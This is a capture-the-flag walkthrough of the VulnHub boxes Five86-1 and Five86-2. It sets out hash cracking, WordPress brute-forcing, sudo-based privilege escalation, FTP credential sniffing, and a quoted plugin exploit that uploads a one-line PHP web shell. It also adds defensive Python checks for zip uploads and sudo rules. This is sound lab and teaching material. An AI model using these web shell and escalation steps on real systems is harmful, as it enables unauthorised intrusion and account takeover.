VulnHub Five86 1 & 2

Notes on working through Five86 – 1 and Five86 – 2.

Five86 – 1

Local IP: 192.168.31.249
Target IP: 192.168.31.212

A directory scan on port 80 finds /robots.txt with Disallow: /ona.

Visiting /ona shows OpenNetAdmin; searchsploit lists an msf module for it, which yields a shell as www-data.

# Find the files owned by www-data
> find / -type f -user www-data 2> /dev/null

> cat /var/www/html/reports/.htaccess
...
AuthUserFile /var/www/.htpasswd

This gives a password hash; the second comment in the file hints that the password is a 10-character string built from the six characters aefhrt.

# Generate a wordlist of every 10-character string over aefhrt
> crunch 10 10 aefhrt -o w.txt

# Write the hash to hash.txt
> echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash.txt

# Crack the hash with john. (The wordlist option is slightly unfriendly: it must be given with =, not with a space.)
> john --wordlist=w.txt hash.txt
Recovered password: fatherrrrr

Log in over SSH as douglas with the password fatherrrrr.

# The cp command can be run as the jen user via sudo without a password
> sudo -l
...
(jen) NOPASSWD: /bin/cp

# Generate a key pair and overwrite jen's .ssh/authorized_keys so that we can log in as jen without a password
> ssh-keygen
...
Your public key has been saved in /home/douglas/.ssh/id_rsa.pub

> cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

# Make the copy in /tmp world-accessible (777) so that the jen user can copy it into its own .ssh directory
> chmod 777 /tmp/authorized_keys

# Do the overwrite
> sudo -u jen cp /tmp/authorized_keys /home/jen/.ssh/

After logging in as jen, there is a mail in /var/mail/jen containing the password of the moss user.

Password: Fire!Fire!

After logging in as moss, running ~/.game/upyourgame gives root.


Five86 – 2

Local IP: 192.168.31.249
Target IP: 192.168.31.90

> cat /etc/hosts
192.168.31.90    five86-2

# Ports
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))

Port 80 serves WordPress; wpscan -e u enumerates the users: admin, gillian, barney, peter, stephen

wpscan -U -P brute-forces the user passwords: barney / spooky1 and stephen / apollo1

After logging in to WordPress, one of the installed plugins, Insert or Embed Articulate Content into WordPress, has an exploit listed on wpvulndb.com:

# Version: 4.2995 <= 4.2997 
# Tested on: WordPress 5.1.1, PHP 5.6 
# CVE : -


## 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php 

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to 

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
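The plugin issue above comes down to extracting an untrusted archive into a web-served directory without looking at what is inside it. The following Python check is an added example (my code, not the plugin's and not part of the exploit text): it inspects an uploaded zip in memory before anything is extracted and rejects archives that carry server-side scripts, per-directory Apache config files, or path-traversal entries, and caps entry count and uncompressed size. The `build_zip` helper and the sample archives are constructed for the demonstration; `POC_ZIP` mirrors the index.html + index.php layout from the exploit text but with placeholder content.

```python
import io
import posixpath
import zipfile

# Extensions that a typical Apache/PHP host would execute rather than serve.
# Apache's mod_mime considers every extension of a name, so "a.php.jpg" counts too.
SERVER_SIDE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

# Per-directory config files that could change how the upload directory is served.
BLOCKED_FILENAMES = {".htaccess", ".htpasswd", ".user.ini"}


def is_unsafe_path(name):
    """True for absolute paths, backslash separators, NULs, or entries that escape the target dir."""
    if name.startswith("/") or "\\" in name or "\x00" in name:
        return True
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")


def check_upload_archive(zip_bytes, max_entries=500, max_total_size=50 * 1024 * 1024):
    """Return the reasons an uploaded zip must be rejected; an empty list means it may be extracted."""
    problems = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    with zf:
        infos = zf.infolist()
        if len(infos) > max_entries:
            problems.append(f"too many entries: {len(infos)}")
        total = 0
        for info in infos:
            name = info.filename
            total += info.file_size  # declared uncompressed size, bounds a zip bomb
            if is_unsafe_path(name):
                problems.append(f"unsafe path: {name}")
                continue
            base = posixpath.basename(posixpath.normpath(name)).lower()
            # every extension in the name, e.g. "shell.php.jpg" -> {".php", ".jpg"}
            exts = {"." + part for part in base.split(".")[1:]}
            if exts & SERVER_SIDE_EXTENSIONS:
                problems.append(f"server-side script: {name}")
            elif base in BLOCKED_FILENAMES:
                problems.append(f"server config file: {name}")
        if total > max_total_size:
            problems.append(f"uncompressed size too large: {total} bytes")
    return problems


def build_zip(files):
    """Constructed sample data: build an in-memory zip from a {name: content} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample archives (contents are placeholders, not the PoC's payload).
POC_ZIP = build_zip({"index.html": "<html>hello</html>", "index.php": "<?php /* placeholder */ ?>"})
CLEAN_ZIP = build_zip({"story.html": "<html>course</html>", "assets/app.js": "console.log(1)"})
TRAVERSAL_ZIP = build_zip({"../evil.txt": "x"})

if __name__ == "__main__":
    for label, data in [("poc", POC_ZIP), ("clean", CLEAN_ZIP), ("traversal", TRAVERSAL_ZIP)]:
        print(label, check_upload_archive(data) or "ok")
```

The check is deliberately a deny-list on names only because that is the part the plugin skipped; on a real host it belongs alongside the other half of the fix, which is serving the upload directory with script execution disabled so that a file that slips through is returned as text instead of run.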

With www-data in hand, su stephen to switch to the stephen account.

paul      1750  0.0  0.0   2600   720 ?        S    15:40   0:00 /bin/sh /home/paul/ftp_upload.sh
paul      1751  0.0  0.2   3224  2180 ?        S    15:40   0:00 ftp -n 172.18.0.10

ps shows an FTP connection running in the background; after tcpdump -c 20 -w f, the capture file f contains the FTP account and password.

> su paul
...
(peter) NOPASSWD: /usr/sbin/service

# service can be abused via service ../../bin/sh to get a shell
> sudo -u peter service ../../bin/sh

# Now running as peter
> whoami
peter

> sudo -l
...
(root) NOPASSWD: /usr/sbin/passwd

# Change the root password
> sudo passwd root

> su root
> whoami
root
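Three of the findings above are the same mistake: a sudoers rule that lets one account run a single binary as another account without a password, where that binary alone is enough to take the account over (cp as jen in Five86 – 1, service as peter and passwd as root in Five86 – 2). The following Python script is an added example, not part of the write-up: it parses `sudo -l` style output and flags such rules. The sample output is constructed to contain the three rules from these two boxes plus a harmless one and an unrestricted one; the risky-command map covers only the binaries seen here and is meant to be extended for a real audit.

```python
import re

# Commands from the Five86 boxes that, once runnable via sudo, hand over the run-as
# account. Extend this map for your own audit.
RISKY_COMMANDS = {
    "cp": "writes arbitrary files as the run-as user (authorized_keys in Five86-1)",
    "service": "its argument is resolved as a path, so it can start an arbitrary program (Five86-2)",
    "passwd": "can set the password of any account, including root (Five86-2)",
}

# One rule line of `sudo -l` output, e.g. "(jen) NOPASSWD: /bin/cp" or "(root : root) ALL".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_rules(sudo_l_output):
    """Turn `sudo -l` text into (runas_user, nopasswd, command) triples."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "Matching Defaults entries ..."
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append((runas, nopasswd, cmd))
    return rules


def audit_sudo_rules(sudo_l_output):
    """Return findings for rules that give the caller control of the run-as account."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(sudo_l_output):
        binary = cmd.split()[0]          # ignore any argument restriction for the lookup
        name = binary.rsplit("/", 1)[-1]
        if cmd == "ALL":
            findings.append({"runas": runas, "command": cmd,
                             "severity": "critical", "reason": "unrestricted sudo"})
        elif name in RISKY_COMMANDS:
            findings.append({"runas": runas, "command": cmd,
                             "severity": "critical" if nopasswd else "high",
                             "reason": RISKY_COMMANDS[name]})
    return findings


# Constructed sample: the three rules seen on Five86-1/-2 plus two others.
SAMPLE_SUDO_L = """\
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
    (peter) NOPASSWD: /usr/sbin/service
    (root) NOPASSWD: /usr/sbin/passwd
    (root) /usr/bin/apt-get update
    (root : root) ALL
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] ({f['runas']}) {f['command']}: {f['reason']}")
```

Feed it the `sudo -l` output of each account you review. The fix is the same for every hit: drop the NOPASSWD tag and, better, restrict the rule to the exact command and arguments the task needs, since a bare binary like cp or service cannot be constrained by sudo at all.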

Summary: I am not familiar with Kali and did not know tools such as john and crunch; when brute-forcing WordPress my wordlists were not complete (I only used top1k and top6k). For future pentests I should prepare wordlists at three orders of magnitude: small, medium and large.
